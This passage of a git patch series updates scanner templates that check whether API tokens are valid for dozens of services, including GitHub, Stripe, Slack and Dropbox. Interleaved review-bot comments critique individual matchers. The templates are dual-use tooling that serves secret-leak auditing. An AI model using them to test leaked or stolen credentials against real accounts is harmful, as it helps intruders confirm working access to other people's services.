From 6d2214d670c54eb5e5fa88ec82b73d83eecc68a4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 Nov 2021 17:52:18 +0530 Subject: [PATCH 01/25] matchers updated --- token-spray/api-adafruit-io.yaml | 5 +++-- .../{apigee-edge.yaml => api-apigee-edge.yaml} | 7 ++++--- token-spray/api-appveyor.yaml | 5 +++-- token-spray/{asana.yaml => api-asana.yaml} | 11 +++++++---- token-spray/api-binance.yaml | 8 ++++---- token-spray/{bingmaps.yaml => api-bingmaps.yaml} | 0 token-spray/{bitly.yaml => api-bitly.yaml} | 5 +++-- token-spray/{buildkite.yaml => api-buildkite.yaml} | 11 +++++++---- token-spray/{buttercms.yaml => api-buttercms.yaml} | 11 +++++++---- token-spray/{calendly.yaml => api-calendly.yaml} | 10 +++++++--- token-spray/{circleci.yaml => api-circleci.yaml} | 9 ++++++--- token-spray/api-cooperhewitt.yaml | 10 +++++++--- token-spray/{deviantart.yaml => api-deviantart.yaml} | 5 ++--- token-spray/api-europeana.yaml | 10 +++++++--- token-spray/api-leanix.yaml | 5 +++-- token-spray/api-strava.yaml | 5 +++-- token-spray/api-taiga.yaml | 5 +++-- token-spray/api-thecatapi.yaml | 10 ++++++---- token-spray/api-webex.yaml | 6 ++++-- 19 files changed, 86 insertions(+), 52 deletions(-) rename token-spray/{apigee-edge.yaml => api-apigee-edge.yaml} (87%) rename token-spray/{asana.yaml => api-asana.yaml} (71%) rename token-spray/{bingmaps.yaml => api-bingmaps.yaml} (100%) rename token-spray/{bitly.yaml => api-bitly.yaml} (83%) rename token-spray/{buildkite.yaml => api-buildkite.yaml} (70%) rename token-spray/{buttercms.yaml => api-buttercms.yaml} (69%) rename token-spray/{calendly.yaml => api-calendly.yaml} (71%) rename token-spray/{circleci.yaml => api-circleci.yaml} (71%) rename token-spray/{deviantart.yaml => api-deviantart.yaml} (88%) diff --git a/token-spray/api-adafruit-io.yaml b/token-spray/api-adafruit-io.yaml index c9eb638d7d..5fc0e8d40c 100644 --- a/token-spray/api-adafruit-io.yaml +++ b/token-spray/api-adafruit-io.yaml 
@@ -19,5 +19,6 @@ requests: - type: word part: body words: - - "error" - negative: true + - '"username":' + - '"id":' + condition: and \ No newline at end of file diff --git a/token-spray/apigee-edge.yaml b/token-spray/api-apigee-edge.yaml similarity index 87% rename from token-spray/apigee-edge.yaml rename to token-spray/api-apigee-edge.yaml index 52c95af31a..e724933ea0 100644 --- a/token-spray/apigee-edge.yaml +++ b/token-spray/api-apigee-edge.yaml @@ -3,8 +3,8 @@ id: api-apigee-edge info: name: Apigee Edge API Test author: dwisiswant0 - reference: https://apidocs.apigee.com/apis severity: info + reference: https://apidocs.apigee.com/apis tags: token-spray,apigee self-contained: true @@ -24,5 +24,6 @@ requests: - type: word part: body words: - - "fault" - negative: true + - '"uuid":' + - '"name":' + condition: and diff --git a/token-spray/api-appveyor.yaml b/token-spray/api-appveyor.yaml index e1b8ee023e..25bac0e370 100644 --- a/token-spray/api-appveyor.yaml +++ b/token-spray/api-appveyor.yaml @@ -20,5 +20,6 @@ requests: - type: word part: body words: - - "Authorization required" - negative: true + - '"roleId":' + - '"created":' + condition: and \ No newline at end of file diff --git a/token-spray/asana.yaml b/token-spray/api-asana.yaml similarity index 71% rename from token-spray/asana.yaml rename to token-spray/api-asana.yaml index 482dc7bdd9..9608f3c236 100644 --- a/token-spray/asana.yaml +++ b/token-spray/api-asana.yaml @@ -16,7 +16,10 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - negative: true - status: - - 401 + - type: word + part: body + words: + - 'data:' + - 'email' + - 'name' + condition: and diff --git a/token-spray/api-binance.yaml b/token-spray/api-binance.yaml index 064b6f6f1d..b2e24bbb78 100644 --- a/token-spray/api-binance.yaml +++ b/token-spray/api-binance.yaml 
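Review bot: The Asana matcher's first word `data:` is missing the closing quote that the JSON key carries on the wire (`"data":`), so under `condition: and` all three words must be present and this template can never report a valid token, assuming Asana returns compact JSON like the other APIs in this commit. The quoted-key form used in every sibling template fixes it: `- '"data":'`, `- '"email":'`, `- '"name":'`. The bare `email` and `name` substrings would otherwise also match an error body that merely mentions those words, so tightening them is worthwhile in its own right.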
@@ -19,7 +19,7 @@ requests: - type: word part: body words: - - "Invalid API-key" - - "key format invalid" - condition: or - negative: true + - '"id":' + - '"price":' + - '"quoteQty":' + condition: and \ No newline at end of file diff --git a/token-spray/bingmaps.yaml b/token-spray/api-bingmaps.yaml similarity index 100% rename from token-spray/bingmaps.yaml rename to token-spray/api-bingmaps.yaml diff --git a/token-spray/bitly.yaml b/token-spray/api-bitly.yaml similarity index 83% rename from token-spray/bitly.yaml rename to token-spray/api-bitly.yaml index 01c70c7974..0a4c307e15 100644 --- a/token-spray/bitly.yaml +++ b/token-spray/api-bitly.yaml @@ -16,6 +16,7 @@ requests: matchers: - type: word part: body - negative: true words: - - 'INVALID_ARG_ACCESS_TOKEN' + - '"long_url":' + - '"created_at":' + condition: and \ No newline at end of file diff --git a/token-spray/buildkite.yaml b/token-spray/api-buildkite.yaml similarity index 70% rename from token-spray/buildkite.yaml rename to token-spray/api-buildkite.yaml index 350b8edd1b..7855f0b53b 100644 --- a/token-spray/buildkite.yaml +++ b/token-spray/api-buildkite.yaml @@ -16,7 +16,10 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"id":' + - '"graphql_id":' + - '"email":' + condition: and \ No newline at end of file diff --git a/token-spray/buttercms.yaml b/token-spray/api-buttercms.yaml similarity index 69% rename from token-spray/buttercms.yaml rename to token-spray/api-buttercms.yaml index 15d86d53fe..21b6d1dff1 100644 --- a/token-spray/buttercms.yaml +++ b/token-spray/api-buttercms.yaml @@ -14,7 +14,10 @@ requests: - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"meta":' + - '"data":' + - '"url":' + condition: and \ No newline at end of file 
diff --git a/token-spray/calendly.yaml b/token-spray/api-calendly.yaml similarity index 71% rename from token-spray/calendly.yaml rename to token-spray/api-calendly.yaml index b54a5c8df8..10a8e83478 100644 --- a/token-spray/calendly.yaml +++ b/token-spray/api-calendly.yaml @@ -16,6 +16,10 @@ requests: X-Token: "{{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"data":' + - '"id":' + - '"email":' + condition: and \ No newline at end of file diff --git a/token-spray/circleci.yaml b/token-spray/api-circleci.yaml similarity index 71% rename from token-spray/circleci.yaml rename to token-spray/api-circleci.yaml index d519f10651..cfe7672786 100644 --- a/token-spray/circleci.yaml +++ b/token-spray/api-circleci.yaml @@ -14,6 +14,9 @@ requests: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"admin"' + - '"login"' + condition: and diff --git a/token-spray/api-cooperhewitt.yaml b/token-spray/api-cooperhewitt.yaml index 339f8ed1b2..a15d91a73e 100644 --- a/token-spray/api-cooperhewitt.yaml +++ b/token-spray/api-cooperhewitt.yaml @@ -14,6 +14,10 @@ requests: - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"stat":' + - '"formats":' + - '"default_format":' + condition: and diff --git a/token-spray/deviantart.yaml b/token-spray/api-deviantart.yaml similarity index 88% rename from token-spray/deviantart.yaml rename to token-spray/api-deviantart.yaml index ab73e7ea0d..b09e9acd2b 100644 --- a/token-spray/deviantart.yaml +++ b/token-spray/api-deviantart.yaml 
@@ -3,8 +3,8 @@ id: api-deviantart info: name: DeviantArt API Test author: zzeitlin - reference: https://www.deviantart.com/developers/authentication severity: info + reference: https://www.deviantart.com/developers/authentication tags: token-spray,deviantart self-contained: true @@ -18,5 +18,4 @@ requests: - type: word part: body words: - - '"status":"error"' - negative: true + - '"status" : "success"' diff --git a/token-spray/api-europeana.yaml b/token-spray/api-europeana.yaml index 69c55b1560..527bf6dd4c 100644 --- a/token-spray/api-europeana.yaml +++ b/token-spray/api-europeana.yaml @@ -14,6 +14,10 @@ requests: - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - 'success' + - 'apikey' + - 'action' + condition: and \ No newline at end of file diff --git a/token-spray/api-leanix.yaml b/token-spray/api-leanix.yaml index 53be0b6e95..172d00ec30 100644 --- a/token-spray/api-leanix.yaml +++ b/token-spray/api-leanix.yaml @@ -21,5 +21,6 @@ requests: - type: word part: body words: - - "Credentials are required" - negative: true + - '"input":' + - '"connectorType":' + condition: and \ No newline at end of file diff --git a/token-spray/api-strava.yaml b/token-spray/api-strava.yaml index b7ec7eb8b9..f81d4897ba 100644 --- a/token-spray/api-strava.yaml +++ b/token-spray/api-strava.yaml @@ -19,5 +19,6 @@ requests: - type: word part: body words: - - "Authorization Error" - negative: true + - '"id"' + - '"username"' + condition: and diff --git a/token-spray/api-taiga.yaml b/token-spray/api-taiga.yaml index b22fc01cf8..6e8748bdf1 100644 --- a/token-spray/api-taiga.yaml +++ b/token-spray/api-taiga.yaml @@ -19,5 +19,6 @@ requests: - type: word part: body words: - - "token_not_valid" - negative: true + - '"auth_code":' + - '"state":' + condition: and 
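Review bot: The replacement DeviantArt word `"status" : "success"` has spaces around the colon, while the matcher it replaces matched the compact form `"status":"error"`; if the API serializes without whitespace, as the old matcher implies, the new positive match never fires and every token is reported invalid. Drop the spaces, `- '"status":"success"'`, or switch to `type: regex` with `"status"\s*:\s*"success"` so either formatting is accepted. The request this matcher belongs to starts above the hunk, so I cannot see which endpoint is queried.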
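Review bot: The Europeana words `success`, `apikey` and `action` are unquoted key names, so they would also match a rejection body that echoes the key and reports `"success":false`; the `and` condition gives no protection when all three strings appear in the failure response as well. Match the value rather than the key, `- '"success":true'`, and pair it with a field only a successful search returns (`"totalResults":` looks plausible from the `profile=facets` query, but confirm against a live response). This is inferred from the key names alone, so check an actual invalid-key response before relying on the template.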
diff --git a/token-spray/api-thecatapi.yaml b/token-spray/api-thecatapi.yaml index f8399778d8..b5c7dab4ac 100644 --- a/token-spray/api-thecatapi.yaml +++ b/token-spray/api-thecatapi.yaml @@ -16,7 +16,9 @@ requests: x-api-key: "{{token}}" matchers: - - type: status - negative: true - status: - - 401 + - type: word + part: body + words: + - '"country_code":' + - '"created_at":' + condition: and diff --git a/token-spray/api-webex.yaml b/token-spray/api-webex.yaml index e8f60ed51b..c5e61ded0b 100644 --- a/token-spray/api-webex.yaml +++ b/token-spray/api-webex.yaml @@ -19,5 +19,7 @@ requests: - type: word part: body words: - - "errors" - negative: true + - 'id' + - 'title' + - 'type' + condition: and From dc81d636301f68c9c44d7dc9c785efba04a5556f Mon Sep 17 00:00:00 2001 
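Review bot: The Webex words `id`, `title` and `type` are bare substrings with no quotes or colon, so they match inside unrelated tokens (a `trackingId` field, or the word "type" in an error message), which makes this the loosest matcher in the commit. Quote them as JSON keys in the style of the other templates: `- '"id":'`, `- '"title":'`, `- '"type":'`. If the endpoint returns a room list as those keys suggest, a more distinctive field such as `"creatorId":` would be better still, but that needs confirming against a real response.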
From: Prince Chaddha Date: Tue, 2 Nov 2021 10:49:21 +0530 Subject: [PATCH 02/25] matcher fixed --- token-spray/{dropbox.yaml => api-dropbox.yaml} | 9 ++++++--- token-spray/{facebook.yaml => api-facebook.yaml} | 0 .../{fontawesome.yaml => api-fontawesome.yaml} | 5 +++-- ...itoken-cloud.yaml => api-fortitoken-cloud.yaml} | 0 token-spray/{github.yaml => api-github.yaml} | 4 +++- .../{sonarcloud.yaml => api-sonarcloud.yaml} | 4 ++-- token-spray/{spotify.yaml => api-spotify.yaml} | 14 +++++++++----- token-spray/{stripe.yaml => api-stripe.yaml} | 12 ++++++++---- token-spray/{tink.yaml => api-tink.yaml} | 0 token-spray/{tinypng.yaml => api-tinypng.yaml} | 0 token-spray/{twitter.yaml => api-twitter.yaml} | 7 ++++--- .../{visualstudio.yaml => api-visualstudio.yaml} | 8 +++++--- token-spray/{wakatime.yaml => api-wakatime.yaml} | 13 ++++++++----- token-spray/{weglot.yaml => api-weglot.yaml} | 0 token-spray/{youtube.yaml => api-youtube.yaml} | 9 +++------ 15 files changed, 51 insertions(+), 34 deletions(-) rename token-spray/{dropbox.yaml => api-dropbox.yaml} (75%) rename token-spray/{facebook.yaml => api-facebook.yaml} (100%) rename token-spray/{fontawesome.yaml => api-fontawesome.yaml} (86%) rename token-spray/{fortitoken-cloud.yaml => api-fortitoken-cloud.yaml} (100%) rename token-spray/{github.yaml => api-github.yaml} (84%) rename token-spray/{sonarcloud.yaml => api-sonarcloud.yaml} (93%) rename token-spray/{spotify.yaml => api-spotify.yaml} (61%) rename token-spray/{stripe.yaml => api-stripe.yaml} (70%) rename token-spray/{tink.yaml => api-tink.yaml} (100%) rename token-spray/{tinypng.yaml => api-tinypng.yaml} (100%) rename token-spray/{twitter.yaml => api-twitter.yaml} (82%) rename token-spray/{visualstudio.yaml => api-visualstudio.yaml} (82%) rename token-spray/{wakatime.yaml => api-wakatime.yaml} (67%) rename token-spray/{weglot.yaml => api-weglot.yaml} (100%) rename token-spray/{youtube.yaml => api-youtube.yaml} (80%) 
diff --git a/token-spray/dropbox.yaml b/token-spray/api-dropbox.yaml similarity index 75% rename from token-spray/dropbox.yaml rename to token-spray/api-dropbox.yaml index 339837160e..cc14c60421 100644 --- a/token-spray/dropbox.yaml +++ b/token-spray/api-dropbox.yaml @@ -16,6 +16,9 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"account_id":' + - '"email":' + condition: and diff --git a/token-spray/facebook.yaml b/token-spray/api-facebook.yaml similarity index 100% rename from token-spray/facebook.yaml rename to token-spray/api-facebook.yaml diff --git a/token-spray/fontawesome.yaml b/token-spray/api-fontawesome.yaml similarity index 86% rename from token-spray/fontawesome.yaml rename to token-spray/api-fontawesome.yaml index 10ec8d5ff5..3a990014df 100644 --- a/token-spray/fontawesome.yaml +++ b/token-spray/api-fontawesome.yaml @@ -24,5 +24,6 @@ requests: - type: word part: body words: - - "No active API token" - negative: true + - '"access_token":' + - '"scopes":' + condition: and diff --git a/token-spray/fortitoken-cloud.yaml b/token-spray/api-fortitoken-cloud.yaml similarity index 100% rename from token-spray/fortitoken-cloud.yaml rename to token-spray/api-fortitoken-cloud.yaml diff --git a/token-spray/github.yaml b/token-spray/api-github.yaml similarity index 84% rename from token-spray/github.yaml rename to token-spray/api-github.yaml index 4722dfe6d3..764b42e28c 100644 --- a/token-spray/github.yaml +++ b/token-spray/api-github.yaml @@ -19,4 +19,6 @@ requests: - type: word part: body words: - - 'login' + - '"login":' + - '"avatar_url":' + condition: and diff --git a/token-spray/sonarcloud.yaml b/token-spray/api-sonarcloud.yaml similarity index 93% rename from token-spray/sonarcloud.yaml rename to token-spray/api-sonarcloud.yaml index aed9d1760f..97831db0bd 100644 --- a/token-spray/sonarcloud.yaml +++ b/token-spray/api-sonarcloud.yaml 
@@ -3,8 +3,8 @@ id: api-sonarcloud info: name: SonarCloud API Test author: zzeitlin - reference: https://sonarcloud.io/web_api/api/authentication severity: info + reference: https://sonarcloud.io/web_api/api/authentication tags: token-spray,sonarcloud self-contained: true @@ -19,4 +19,4 @@ requests: - type: word part: body words: - - 'true' + - '{"valid": true}' diff --git a/token-spray/spotify.yaml b/token-spray/api-spotify.yaml similarity index 61% rename from token-spray/spotify.yaml rename to token-spray/api-spotify.yaml index 01f1d80084..ee518e36b4 100644 --- a/token-spray/spotify.yaml +++ b/token-spray/api-spotify.yaml @@ -3,19 +3,23 @@ id: api-spotify info: name: Spotify API Test author: zzeitlin - reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ severity: info + reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ tags: token-spray,spotify self-contained: true requests: - method: GET path: - - "https://api.spotify.com/v1/me" + - "https://api.spotify.com/v1/me/player/devices" headers: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"devices":' + - '"id":' + - '"is_active":' + condition: and \ No newline at end of file diff --git a/token-spray/stripe.yaml b/token-spray/api-stripe.yaml similarity index 70% rename from token-spray/stripe.yaml rename to token-spray/api-stripe.yaml index 50e8979aa7..d06b38bd8c 100644 --- a/token-spray/stripe.yaml +++ b/token-spray/api-stripe.yaml @@ -3,8 +3,8 @@ id: api-stripe info: name: Stripe API Test author: zzeitlin - reference: https://stripe.com/docs/api/authentication severity: info + reference: https://stripe.com/docs/api/authentication tags: token-spray,stripe self-contained: true 
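Review bot: The SonarCloud word `{"valid": true}` pins the exact whitespace of the response body; if the server ever emits `"valid":true` or pretty-printed JSON the match fails silently and every token is reported invalid. A `type: regex` matcher such as `"valid"\s*:\s*true` keeps the improvement over the old bare `true` (which would have matched any body containing the word) without depending on serialization details. The request this matcher belongs to begins above the hunk.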
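Review bot: Moving the Spotify path from `/v1/me` to `/v1/me/player/devices` ties the check to a scoped endpoint: as far as I know the devices call requires the `user-read-playback-state` scope, so a valid token issued without it gets a 403 and is reported as invalid, whereas `/v1/me` answers any user token. If the endpoint was changed only to get distinctive keys, keep `/v1/me` and match its own fields instead, e.g. `- '"display_name":'`, `- '"external_urls":'`, `- '"href":'`. Verify the scope requirement against Spotify's current docs before reverting.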
@@ -16,6 +16,10 @@ requests: Authorization: Basic {{base64(token + ':')}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"object":' + - '"url":' + - '"data":' + condition: and \ No newline at end of file diff --git a/token-spray/tink.yaml b/token-spray/api-tink.yaml similarity index 100% rename from token-spray/tink.yaml rename to token-spray/api-tink.yaml diff --git a/token-spray/tinypng.yaml b/token-spray/api-tinypng.yaml similarity index 100% rename from token-spray/tinypng.yaml rename to token-spray/api-tinypng.yaml diff --git a/token-spray/twitter.yaml b/token-spray/api-twitter.yaml similarity index 82% rename from token-spray/twitter.yaml rename to token-spray/api-twitter.yaml index ec654b2782..ce6de967e8 100644 --- a/token-spray/twitter.yaml +++ b/token-spray/api-twitter.yaml @@ -3,8 +3,8 @@ id: api-twitter info: name: Twitter API Test author: zzeitlin - reference: https://developer.twitter.com/en/docs/twitter-api/api-reference-index severity: info + reference: https://developer.twitter.com/en/docs/twitter-api/api-reference-index tags: token-spray,twitter self-contained: true @@ -19,5 +19,6 @@ requests: - type: word part: body words: - - 'error' - negative: true + - '"account_name":' + - '"subscriptions_count_all":' + condition: and diff --git a/token-spray/visualstudio.yaml b/token-spray/api-visualstudio.yaml similarity index 82% rename from token-spray/visualstudio.yaml rename to token-spray/api-visualstudio.yaml index e7c0a0a2f8..a3440fdb9a 100644 --- a/token-spray/visualstudio.yaml +++ b/token-spray/api-visualstudio.yaml @@ -3,8 +3,8 @@ id: api-visualstudio info: name: Visual Studio API Test author: zzeitlin - reference: https://openapi.appcenter.ms/ severity: info + reference: https://openapi.appcenter.ms/ tags: token-spray,visualstudio,microsoft self-contained: true 
@@ -19,6 +19,8 @@ requests: matchers: - type: word part: body - negative: true words: - - 'Unauthorized' + - '"id":' + - '"description":' + - '"owner":' + condition: and diff --git a/token-spray/wakatime.yaml b/token-spray/api-wakatime.yaml similarity index 67% rename from token-spray/wakatime.yaml rename to token-spray/api-wakatime.yaml index 7237446fce..07755c952b 100644 --- a/token-spray/wakatime.yaml +++ b/token-spray/api-wakatime.yaml @@ -3,8 +3,8 @@ id: api-wakatime info: name: WakaTime CI API Test author: zzeitlin - reference: https://wakatime.com/developers severity: info + reference: https://wakatime.com/developers tags: token-spray,wakatime self-contained: true @@ -14,7 +14,10 @@ requests: - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"data":' + - '"seconds":' + - '"is_up_to_date":' + condition: and diff --git a/token-spray/weglot.yaml b/token-spray/api-weglot.yaml similarity index 100% rename from token-spray/weglot.yaml rename to token-spray/api-weglot.yaml diff --git a/token-spray/youtube.yaml b/token-spray/api-youtube.yaml similarity index 80% rename from token-spray/youtube.yaml rename to token-spray/api-youtube.yaml index 8c1384579b..be1531a453 100644 --- a/token-spray/youtube.yaml +++ b/token-spray/api-youtube.yaml @@ -13,13 +13,10 @@ requests: path: - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" - matchers-condition: or matchers: - type: word part: body words: - - 'quotaExceeded' - - - type: status - status: - - 200 + - '"kind":' + - '"pageInfo":' + condition: and \ No newline at end of file From 462c4f7b12fbc0db137636d07c7ca75ce93c2ed6 Mon Sep 17 00:00:00 2001 
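Review bot: Dropping the `quotaExceeded` alternative changes the outcome for a valid YouTube key whose daily quota is exhausted: that response is an error object without `"kind":` or `"pageInfo":`, so it now fails the `and` matcher and the key is reported invalid, whereas the removed `matchers-condition: or` deliberately counted it as valid. Keep a second matcher under `matchers-condition: or` with `words: ['quotaExceeded']` alongside the positive key match, and add a one-line comment above it saying that a quota error still proves the key is live. The exhausted-quota case is common for leaked keys, so losing it weakens the check noticeably.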
From: Prince Chaddha Date: Wed, 10 Nov 2021 15:05:20 +0530 Subject: [PATCH 03/25] more changes --- token-spray/{heroku.yaml => api-heroku.yaml} | 13 ++++++------- token-spray/{hubspot.yaml => api-hubspot.yaml} | 17 +++++++++++++---- .../{instagram.yaml => api-instagram.yaml} | 12 ++++++++---- .../{intercom.yaml => api-intercom.yaml} | 0 token-spray/{ipstack.yaml => api-ipstack.yaml} | 8 +++++--- .../{iterable.yaml => api-iterable.yaml} | 10 +++++----- .../{jumpcloud.yaml => api-jumpcloud.yaml} | 7 ++++--- .../{linkedin.yaml => api-linkedin.yaml} | 6 ++++-- .../{lokalise.yaml => api-lokalise.yaml} | 16 ++++++++++------ token-spray/{loqate.yaml => api-loqate.yaml} | 4 ++-- .../{mailchimp.yaml => api-mailchimp.yaml} | 2 +- token-spray/{mailgun.yaml => api-mailgun.yaml} | 12 ++++++++---- token-spray/{mapbox.yaml => api-mapbox.yaml} | 11 +++++++---- .../{nerdgraph.yaml => api-nerdgraph.yaml} | 2 +- token-spray/{netlify.yaml => api-netlify.yaml} | 12 ++++++++---- token-spray/{npm.yaml => api-npm.yaml} | 4 ++-- .../{onelogin.yaml => api-onelogin.yaml} | 16 ++++++++++------ .../{openweather.yaml => api-openweather.yaml} | 12 ++++++++---- .../{optimizely.yaml => api-optimizely.yaml} | 6 ++++-- .../{pagerduty.yaml => api-pagerduty.yaml} | 12 +++++++----- token-spray/{paypal.yaml => api-paypal.yaml} | 0 token-spray/{pendo.yaml => api-pendo.yaml} | 13 +++++++------ ...otaltracker.yaml => api-pivotaltracker.yaml} | 1 + .../{postmark.yaml => api-postmark.yaml} | 14 +++++++++----- .../{sendgrid.yaml => api-sendgrid.yaml} | 2 +- token-spray/{slack.yaml => api-slack.yaml} | 6 ++++-- .../{travisci.yaml => api-travisci.yaml} | 2 +- 27 files changed, 136 insertions(+), 84 deletions(-) rename token-spray/{heroku.yaml => api-heroku.yaml} (76%) rename token-spray/{hubspot.yaml => api-hubspot.yaml} (54%) rename token-spray/{instagram.yaml => api-instagram.yaml} (55%) rename token-spray/{intercom.yaml => api-intercom.yaml} (100%) rename token-spray/{ipstack.yaml => api-ipstack.yaml} (79%) 
rename token-spray/{iterable.yaml => api-iterable.yaml} (55%) rename token-spray/{jumpcloud.yaml => api-jumpcloud.yaml} (85%) rename token-spray/{linkedin.yaml => api-linkedin.yaml} (82%) rename token-spray/{lokalise.yaml => api-lokalise.yaml} (55%) rename token-spray/{loqate.yaml => api-loqate.yaml} (73%) rename token-spray/{mailchimp.yaml => api-mailchimp.yaml} (100%) rename token-spray/{mailgun.yaml => api-mailgun.yaml} (70%) rename token-spray/{mapbox.yaml => api-mapbox.yaml} (71%) rename token-spray/{nerdgraph.yaml => api-nerdgraph.yaml} (100%) rename token-spray/{netlify.yaml => api-netlify.yaml} (70%) rename token-spray/{npm.yaml => api-npm.yaml} (90%) rename token-spray/{onelogin.yaml => api-onelogin.yaml} (58%) rename token-spray/{openweather.yaml => api-openweather.yaml} (69%) rename token-spray/{optimizely.yaml => api-optimizely.yaml} (85%) rename token-spray/{pagerduty.yaml => api-pagerduty.yaml} (76%) rename token-spray/{paypal.yaml => api-paypal.yaml} (100%) rename token-spray/{pendo.yaml => api-pendo.yaml} (74%) rename token-spray/{pivotaltracker.yaml => api-pivotaltracker.yaml} (94%) rename token-spray/{postmark.yaml => api-postmark.yaml} (63%) rename token-spray/{sendgrid.yaml => api-sendgrid.yaml} (100%) rename token-spray/{slack.yaml => api-slack.yaml} (80%) rename token-spray/{travisci.yaml => api-travisci.yaml} (100%) diff --git a/token-spray/heroku.yaml b/token-spray/api-heroku.yaml similarity index 76% rename from token-spray/heroku.yaml rename to token-spray/api-heroku.yaml index ef81ec91e8..ef9b58c7ae 100644 --- a/token-spray/heroku.yaml +++ b/token-spray/api-heroku.yaml @@ -17,10 +17,9 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - condition: or - status: - - 200 - - 201 - - 202 - - 206 + - type: word + part: body + words: + - '"created_at":' + - '"git_url":' + condition: and \ No newline at end of file 
diff --git a/token-spray/hubspot.yaml b/token-spray/api-hubspot.yaml similarity index 54% rename from token-spray/hubspot.yaml rename to token-spray/api-hubspot.yaml index da95a4b12a..4526b146f6 100644 --- a/token-spray/hubspot.yaml +++ b/token-spray/api-hubspot.yaml @@ -3,8 +3,8 @@ id: api-hubspot info: name: HubSpot API Test author: zzeitlin - reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners severity: info + reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners tags: token-spray,hubspot self-contained: true @@ -12,11 +12,20 @@ requests: - method: GET path: - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" + - "https://api.hubapi.com/contacts/v1/lists/static?count=3&hapikey={{token}}" + matchers-condition: or matchers: - type: word part: body words: - - 'error' - negative: true + - '"portalId":' + - '"ownerId":' + condition: and + + - type: word + part: body + words: + - '"metaData":' + - '"portalId":' + condition: and \ No newline at end of file diff --git a/token-spray/instagram.yaml b/token-spray/api-instagram.yaml similarity index 55% rename from token-spray/instagram.yaml rename to token-spray/api-instagram.yaml index dd851bee3e..fc463c8bac 100644 --- a/token-spray/instagram.yaml +++ b/token-spray/api-instagram.yaml @@ -11,9 +11,13 @@ self-contained: true requests: - method: GET path: - - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" + - "https://graph.facebook.com/v12.0/me/accounts?access_token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"data":' + - '"access_token":' + - '"name":' + condition: and diff --git a/token-spray/intercom.yaml b/token-spray/api-intercom.yaml similarity index 100% rename from token-spray/intercom.yaml rename to token-spray/api-intercom.yaml 
diff --git a/token-spray/ipstack.yaml b/token-spray/api-ipstack.yaml similarity index 79% rename from token-spray/ipstack.yaml rename to token-spray/api-ipstack.yaml index ac527d2a1e..8f560a1b34 100644 --- a/token-spray/ipstack.yaml +++ b/token-spray/api-ipstack.yaml @@ -3,8 +3,8 @@ id: api-ipstack info: name: IPStack API Test author: zzeitlin - reference: https://ipstack.com/documentation severity: info + reference: https://ipstack.com/documentation tags: token-spray,ipstack self-contained: true @@ -16,6 +16,8 @@ requests: matchers: - type: word part: body - negative: true words: - - 'invalid_access_key' + - '"ip":' + - '"hostname":' + - '"type":' + condition: and diff --git a/token-spray/iterable.yaml b/token-spray/api-iterable.yaml similarity index 55% rename from token-spray/iterable.yaml rename to token-spray/api-iterable.yaml index 69da55de5d..b559444b8f 100644 --- a/token-spray/iterable.yaml +++ b/token-spray/api-iterable.yaml @@ -3,22 +3,22 @@ id: api-iterable info: name: Iterable API Test author: zzeitlin - reference: https://api.iterable.com/api/docs severity: info + reference: https://api.iterable.com/api/docs tags: token-spray,iterable self-contained: true requests: - method: GET path: - - "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty" + - "https://api.iterable.com/api/catalogs" headers: Api_Key: "{{token}}" matchers: - type: word part: body - negative: true words: - - 'BadApiKey' - - 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve + - '"name":' + - '"catalogNames":' + condition: and diff --git a/token-spray/jumpcloud.yaml b/token-spray/api-jumpcloud.yaml similarity index 85% rename from token-spray/jumpcloud.yaml rename to token-spray/api-jumpcloud.yaml index dbf3c9ab35..6b9dc68d93 100644 --- a/token-spray/jumpcloud.yaml +++ b/token-spray/api-jumpcloud.yaml 
@@ -3,8 +3,8 @@ id: api-jumpcloud info: name: JumpCloud API Test author: zzeitlin - reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key severity: info + reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key tags: token-spray,jumpcloud self-contained: true @@ -18,6 +18,7 @@ requests: matchers: - type: word part: body - negative: true words: - - 'Unauthorized' + - '"_id":' + - '"agentServer":' + condition: and diff --git a/token-spray/linkedin.yaml b/token-spray/api-linkedin.yaml similarity index 82% rename from token-spray/linkedin.yaml rename to token-spray/api-linkedin.yaml index 611f28d422..3631ace894 100644 --- a/token-spray/linkedin.yaml +++ b/token-spray/api-linkedin.yaml @@ -21,6 +21,8 @@ requests: - type: word part: body - negative: true words: - - "serviceErrorCode" \ No newline at end of file + - '"id":' + - '"firstName":' + - '"localized":' + condition: and \ No newline at end of file diff --git a/token-spray/lokalise.yaml b/token-spray/api-lokalise.yaml similarity index 55% rename from token-spray/lokalise.yaml rename to token-spray/api-lokalise.yaml index 5003f25b31..c513a20064 100644 --- 